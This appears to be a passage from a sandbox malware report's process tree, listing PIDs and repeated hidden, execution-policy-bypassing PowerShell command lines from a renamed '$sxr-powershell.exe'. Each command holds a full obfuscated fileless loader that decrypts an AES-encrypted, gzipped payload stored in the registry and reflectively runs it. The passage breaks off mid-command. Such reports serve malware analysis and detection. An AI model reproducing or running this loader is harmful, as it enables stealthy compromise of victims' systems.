[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        36⤵
        
        PID:4624
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4512).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        36⤵
        
        PID:1616
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4512" "3280" "3200" "3284" "0" "0" "3288" "0" "0" "0" "0" "0"
        36⤵
        
        PID:5492
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7840).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        35⤵
        
        PID:8000
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7840).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, 